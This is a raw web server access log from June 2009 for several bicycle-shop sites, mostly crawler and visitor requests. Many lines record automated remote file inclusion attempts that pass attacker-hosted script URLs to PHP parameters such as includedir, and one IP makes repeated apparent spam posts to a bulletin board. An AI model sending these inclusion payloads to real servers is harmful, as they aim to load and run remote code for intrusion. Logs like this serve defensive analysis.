204.62.53.203 - - [10/Jun/2009:12:32:30 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:12:37:08 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:12:37:17 -0700] "GET /translations?M=A HTTP/1.1" 301 103 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:12:37:28 -0700] "GET /translations/?M=A HTTP/1.1" 200 3847 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:12:38:39 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:12:45:03 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
114.80.93.71 - - [10/Jun/2009:12:55:28 -0700] "GET / HTTP/1.1" 200 1764 "http://bicyclestoreshouston.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "bicyclestoreshouston.com"
220.181.61.234 - - [10/Jun/2009:12:56:36 -0700] "GET / HTTP/1.1" 200 1764 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.bicyclestoreshouston.com"
195.187.41.140 - - [10/Jun/2009:13:25:42 -0700] "GET /send_reminders.php?noSet=0&includedir=http://coreto7.freehostia.com/scan/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.187.41.140 - - [10/Jun/2009:13:25:42 -0700] "GET /logs//send_reminders.php?noSet=0&includedir=http://coreto7.freehostia.com/scan/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
195.187.41.140 - - [10/Jun/2009:13:25:57 -0700] "GET /logs/access.log%20%20//send_reminders.php?noSet=0&includedir=http://coreto7.freehostia.com/scan/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.62.53.203 - - [10/Jun/2009:13:50:01 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
204.62.53.203 - - [10/Jun/2009:13:50:22 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.svbikes.com"
96.49.143.24 - - [10/Jun/2009:14:06:13 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
96.49.143.24 - - [10/Jun/2009:14:06:14 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
96.49.143.24 - - [10/Jun/2009:14:06:17 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729)" "www.svbikes.com"
66.249.68.210 - - [10/Jun/2009:14:21:59 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "www.svbikes.com"
61.247.222.54 - - [10/Jun/2009:14:35:19 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.svbikes.com"
61.247.222.54 - - [10/Jun/2009:14:35:21 -0700] "GET /bullitinboard/viewtopic.php?p=1692 HTTP/1.1" 200 533 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "www.svbikes.com"
76.164.212.18 - - [10/Jun/2009:14:36:32 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.164.212.18 - - [10/Jun/2009:14:36:32 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.164.212.18 - - [10/Jun/2009:14:36:32 -0700] "GET /skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.164.212.18 - - [10/Jun/2009:14:42:58 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:15:02:27 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:15:02:27 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
65.55.106.243 - - [10/Jun/2009:15:12:02 -0700] "GET /translations/Dutch.txt HTTP/1.1" 200 28744 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:15:16:21 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:15:16:39 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:15:21:47 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:15:22:48 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:15:22:49 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
24.9.37.230 - - [10/Jun/2009:15:24:18 -0700] "GET /fit.html HTTP/1.1" 200 17443 "http://www.bing.com/search?q=correct+pedal+stroke&form=QBRE" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.svbikes.com"
24.9.37.230 - - [10/Jun/2009:15:24:18 -0700] "GET /images/fit2.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.svbikes.com"
24.9.37.230 - - [10/Jun/2009:15:24:19 -0700] "GET /images/SVB_Logos_gif_version_1_.gif HTTP/1.1" 404 275 "http://www.svbikes.com/fit.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.svbikes.com"
24.9.37.230 - - [10/Jun/2009:15:24:21 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:15:27:23 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:15:35:46 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
193.47.80.45 - - [10/Jun/2009:15:37:53 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
193.47.80.45 - - [10/Jun/2009:15:37:53 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:15:43:06 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:15:44:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:15:50:59 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
76.164.212.18 - - [10/Jun/2009:16:08:57 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
76.164.212.18 - - [10/Jun/2009:16:09:05 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
76.164.212.18 - - [10/Jun/2009:16:11:23 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.164.212.18 - - [10/Jun/2009:16:11:23 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.164.212.18 - - [10/Jun/2009:16:11:23 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:16:13:09 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:16:13:09 -0700] "GET /bullitinboard/viewtopic.php?p=1625 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:16:13:10 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:16:13:11 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Jun/2009:16:13:11 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
76.164.212.18 - - [10/Jun/2009:16:21:44 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
76.164.212.18 - - [10/Jun/2009:16:21:44 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
76.164.212.18 - - [10/Jun/2009:16:21:44 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
76.164.212.18 - - [10/Jun/2009:16:21:49 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
76.164.212.18 - - [10/Jun/2009:16:21:58 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
76.164.212.18 - - [10/Jun/2009:16:21:58 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
66.249.68.109 - - [10/Jun/2009:16:40:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "bicyclestoreshouston.com"
66.249.68.109 - - [10/Jun/2009:16:40:50 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)" "bicyclestoreshouston.com"
72.30.142.250 - - [10/Jun/2009:17:05:06 -0700] "GET /bullitinboard/viewtopic.php?p=11782 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.svbikes.com"
80.64.175.6 - - [10/Jun/2009:17:08:06 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://bicyclestoreshouston.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "bicyclestoreshouston.com"
211.189.40.249 - - [10/Jun/2009:17:34:51 -0700] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.40.249 - - [10/Jun/2009:17:34:52 -0700] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.189.40.249 - - [10/Jun/2009:17:34:52 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
208.80.195.27 - - [10/Jun/2009:17:43:56 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; VZ_IE6; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "bicyclestoreshouston.com"
72.30.142.240 - - [10/Jun/2009:17:46:02 -0700] "GET /bullitinboard/viewtopic.php?p=12206 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:18:21:18 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:18:35:07 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
222.239.76.25 - - [10/Jun/2009:18:36:11 -0700] "GET /logs/access.log%20%20//send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.239.76.25 - - [10/Jun/2009:18:36:11 -0700] "GET /send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.239.76.25 - - [10/Jun/2009:18:36:11 -0700] "GET /logs//send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
222.239.76.25 - - [10/Jun/2009:18:38:24 -0700] "GET /logs/access.log//send_reminders.php?includedir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:18:45:39 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:19:00:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
91.121.150.170 - - [10/Jun/2009:19:00:48 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
113.29.225.7 - - [10/Jun/2009:19:02:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
113.29.225.7 - - [10/Jun/2009:19:02:55 -0700] "GET /skin/zero_vote/error.php?dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
113.29.225.7 - - [10/Jun/2009:19:02:55 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:19:14:20 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:19:14:28 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
216.129.119.14 - - [10/Jun/2009:19:21:21 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:19:21:41 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:19:21:41 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:24:50 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:24:50 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:24:50 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:25:00 -0700] "GET /translations/Finnish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:27:19 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:27:22 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:27:22 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:27:46 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:27:46 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:27:46 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:32:12 -0700] "GET /ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:32:12 -0700] "GET /translations//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:32:12 -0700] "GET /translations/Spanish.txt%20%20//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:32:18 -0700] "GET /translations/Finnish.txt%20%20//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:19:32:24 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:19:33:04 -0700] "GET /translations//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:33:04 -0700] "GET /ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:33:04 -0700] "GET /translations/Spanish.txt%20%20//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:33:10 -0700] "GET /translations/Finnish.txt%20%20//ws/get_events.php?includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
61.247.222.44 - - [10/Jun/2009:19:33:12 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "houstonbikeshop.com"
61.247.222.44 - - [10/Jun/2009:19:33:16 -0700] "GET /bullitinboard/viewtopic.php?p=3808 HTTP/1.1" 200 533 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "houstonbikeshop.com"
91.121.150.170 - - [10/Jun/2009:19:45:03 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "bicyclestoreshouston.com"
91.121.150.170 - - [10/Jun/2009:19:51:36 -0700] "POST /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:56:07 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:19:56:07 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:19:56:07 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:19:56:17 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:56:17 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:56:23 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:56:23 -0700] "GET /translations/Italian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
201.232.54.48 - - [10/Jun/2009:19:56:37 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:19:56:37 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:19:56:37 -0700] "GET /translations/Portuguese_BR.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
201.232.54.48 - - [10/Jun/2009:19:57:28 -0700] "GET /translations/Spanish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
201.232.54.48 - - [10/Jun/2009:19:57:28 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.kiralyfa.hu/copyright?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
